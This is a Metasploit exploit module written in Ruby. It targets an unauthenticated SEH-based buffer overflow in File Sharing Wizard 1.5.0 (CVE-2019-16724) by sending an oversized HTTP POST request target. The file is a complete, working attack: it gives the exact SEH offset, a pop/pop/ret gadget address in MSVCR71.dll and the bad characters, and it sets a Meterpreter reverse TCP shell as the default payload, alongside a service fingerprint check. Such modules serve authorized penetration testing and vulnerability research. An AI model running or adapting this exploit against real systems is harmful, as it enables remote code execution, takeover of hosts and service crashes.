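##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit for File Sharing Wizard 1.5.0 (CVE-2019-16724 / EDB-47412).
#
# The overflow is triggered by an oversized request target in an
# unauthenticated HTTP POST; the SEH chain is overwritten and execution is
# redirected through a pop/pop/ret gadget in MSVCR71.dll.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'File Sharing Wizard - POST SEH Overflow',
        'Description' => %q(
          This module exploits an unauthenticated HTTP POST SEH-based buffer
          overflow in File Sharing Wizard 1.5.0.
        ),
        'Author' => [
          'x00pwn', # Original exploit
          'Dean Welch ' # Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          %w[CVE 2019-16724],
          %w[EDB 47412]
        ],
        # NUL would terminate the copied string; 0x20 is presumably excluded
        # because the buffer travels in the HTTP request-line, where a space
        # ends the request target (see #exploit) -- confirm against the service.
        'Payload' => { 'BadChars' => "\x00\x20" },
        'DisclosureDate' => '2019-09-24',
        'DefaultOptions' => {
          'RPORT' => 80,
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Targets' => [
          [
            'Windows Vista / Windows 7 (x86)',
            {
              'Offset' => 1040, # bytes of filler before the SEH record
              # 0x7c38a67f : pop ecx # pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll]
              # Address lives in an application-shipped DLL, so it is
              # independent of the OS build (no ASLR/rebase for that module).
              'Ret' => 0x7c38a67f
            }
          ]
        ]
        # TODO(review): consider adding 'Notes' (Stability/Reliability/SideEffects)
        # per current module guidelines; an SEH overflow that misfires will
        # most likely take the service down.
      )
    )
  end

  # Fingerprint the service by the Basic-auth realm advertised in its 401
  # challenge. No overflow is attempted here.
  #
  # @return [Msf::Exploit::CheckCode] Detected when the 401 response carries
  #   the File Sharing Wizard realm, Safe for any other response.
  # @raise aborts via fail_with(Failure::Unreachable) when no response arrives.
  def check
    res = send_request_cgi
    fail_with(Failure::Unreachable, 'Connection timed out.') if res.nil?

    # A 401 without a WWW-Authenticate header is not our target; coercing with
    # to_s avoids a NoMethodError on nil instead of crashing the check.
    challenge = res.headers['WWW-Authenticate'].to_s
    if res.code == 401 && challenge.include?('Basic realm="File Sharing Wizard"')
      CheckCode::Detected
    else
      CheckCode::Safe
    end
  end

  # Deliver the overflow as the request target of a POST.
  #
  # The buffer is `Offset` bytes of filler followed by the SEH record and
  # payload assembled by generate_seh_payload (nSEH short jump, SEH = the
  # pop/pop/ret gadget in target.ret, then the encoded payload). A response
  # is not expected -- the process is hijacked or crashes -- hence the zero
  # timeout passed to send_request_raw.
  def exploit
    buf = rand_text_english(target['Offset'])
    buf << generate_seh_payload(target.ret)

    print_status('Sending payload to target')
    send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)
  end
end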